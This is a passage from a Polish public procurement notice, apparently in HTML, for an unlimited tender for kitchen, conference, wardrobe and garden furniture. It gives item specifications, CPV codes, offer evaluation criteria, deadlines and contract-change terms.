cm, wys. max 13,5 cm, gł.50 cm; •	maksymalna wydajność wyciągu (norma EN-61591) (w m³/h): 203; natężenie hałasu przy maksymalnej prędkości wyciągu (w dB): 66; ilość silników 1; •	Ilość sztuk – 1Część VII – wyposażenie ogroduI.	stół ogrodowy •	materiał blatu stołu: plastik, materiał konstrukcji stołu: plastik; •	składany, owalny,•	wymiar: dł: 135 cm, szer: 80 cm, •	kolor szary•	Ilość sztuk – 4II.	krzesło ogrodowe •	materiał wykonania: plastik, dopuszczalne obciążenie min. 110 kg, •	wysokość 79 cm x szerokość 56 cm x głębokość 58 cm, •	podłokietniki, •	kolor szary•	Ilość sztuk – 30III. parasol ogrodowy •	poszycie z wodoodpornego poliestru, stelaż z aluminium proszkowanego, z możliwością zginania, z korbką i wentylacją, z funkcją przechyłu, •	wymiary: średnica 300 cm, wysokość 248 cm,•	kolor szary•	Ilość sztuk – 4IV.	podstawa parasola •	materiał: plastik, •	wymiary: szer. 44cm, dł. 40 cm, wys.12 cm, •	poj. 12l, •	kolor szary antracyt,•	dopasowana do średnicy drążka parasola•	Ilość sztuk – 4Dopuszczalna różnica między podanymi wymiarami -/+ 2 cm </span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">39000000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39100000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39200000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>39700000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>32300000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>37440000-4</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc">PLN</span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2019-11-25</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu"></span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin dostawy </TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiajacy przewiduje, w celu nalezytego wykonania przedmiotu umowy, mozliwosc zmiany jej postanowien w stosunku do tresci oferty Wykonawcy jezeli po zawarciu umowy dojdzie do zmian przepisów prawa lub wprowadzenia nowych przepisów prawa lub zmiany lub wprowadzenia nowej bezwzglednie obowiazujacej normy powodujacej koniecznosc zmiany, modyfikacji lub odstepstwa w odniesieniu do przedmiotu zamówienia. 2. Wystapienie wymienionej w ust. 1 okolicznosci nie stanowi zobowiazania Zamawiajacego do dokonania zmiany, ani nie moze stanowic podstawy roszczen Wykonawcy do ich dokonania.W przypadku obnizenia stawki podatku od towarów i usług wynagrodzenie ulegnie stosownemu obnizeniu, z tym, ze kwota netto obliczona z uwzglednieniem obowiazujacej w dacie zawarcia niniejszej umowy stawki podatku od towarów i usług nie ulegnie zmianie.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-11-05</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">14:45</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Część 1 - Meble </td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 1 - Meble Zestaw mebli kuchennych – każda szafka dolna i wisząca w tym samym kolorze oraz wykończeniem. Meble będą tworzyć zestaw.I.	Szafki dolne 1.	szafka stojąca:•	wymiary: sz./ wys./gł. 60/81/46-55 cm •	z szufladą w górnej części, dwudrzwiowa otwierana na boki, półka demontowana w środku.•	Ilość sztuk – 1 •	szafka stojąca pod zlewozmywak wraz ze zlewozmywakiem dwukomorowym nakładanym. •	wymiary: sz./ wys./gł. 68/81/46-55 cm,•	dwoje drzwiczek •	Typ zlewozmywaka nakładany•	Wymiary (szer. x głęb.) 800 x 500 mm•	Kolor srebrny•	Wykonanie stal szlachetna •	Otwór na baterię tak•	Ilość sztuk – 1 II.	Szafki górne1.	szafka wisząca z przeszkleniem•	wymiary: szerokość 60 cm, głęb. 31 cm, wysokość 57-60•	dwoje drzwiczek , 2 półki demontowane w środku. •	Ilość sztuk – 1 2.	szafka wisząca okapowa•	wymiary: szerokość 60 cm, głęb. 31 cm, wysokość 57-60•	jednodrzwiowa, otwierana do góry, zawiasy z siłownikami utrzymującymi drzwiczki podczas otwierania. •	Ilość sztuk – 1 3.	szafka wisząca z suszarką na naczynia mokre•	Wymiary: szerokość 80 cm, głęb. 31 cm, wysokość 57-60•	dwudrzwiowa, •	Ilość sztuk – 1 Kolor i wykończenie wszystkich szafki : Kolor brązowy lub dąb, wykonanie frontu łatwo zmywalne, odporne na wodę, uchwyty szafek górnych i dolnych łatwe w utrzymaniu czystości, bez ostrych zakończeń. III.	blat kuchenny•	materiał wykonania: płyta wiórowa laminowana, kolor zbliżony do koloru szafek•	wymiary :gr: 38mm, szer.: 60 cm, długość: 305 cm•	Ilość sztuk – 1 IV.	stół konferencyjny •	blat wykonany z płyty laminowanej, kolor klon, z metalowym stelażem i okrągłymi nogami, •	Wymiary: 139 x 75 x 76 cm•	Ilość sztuk – 4V.	krzesło tapicerowane •	stelaż krzesła wykonany z rury okrągłej o średnicy 25 mm, siedzisko i oparcie tapicerowane, wymiary: szerokość siedziska 38 cm (kolory szarości)•	Ilość sztuk – 30VI.	szafa ubraniowa schowkowa •	o wymiarach 90 x 55 x 187,5 cm, szafa wykonana z płyty laminowanej w tonacji klonu, o gr. płyty 18 mm, drzwi wykonane z płyty z trwałą okleiną termoplastyczną, kolor drzwi frontowych w tonacji szaro-białej, szafy/schowki wyposażone w plastikowe uchwyty (gałki) w kolorze aluminium. Szafy wyposażone w metalowe nóżki, z podziałem na cztery schowki, każdy schowek posiada wieszak na ubrania, oraz wyposażone w zamki z kluczem w każdym 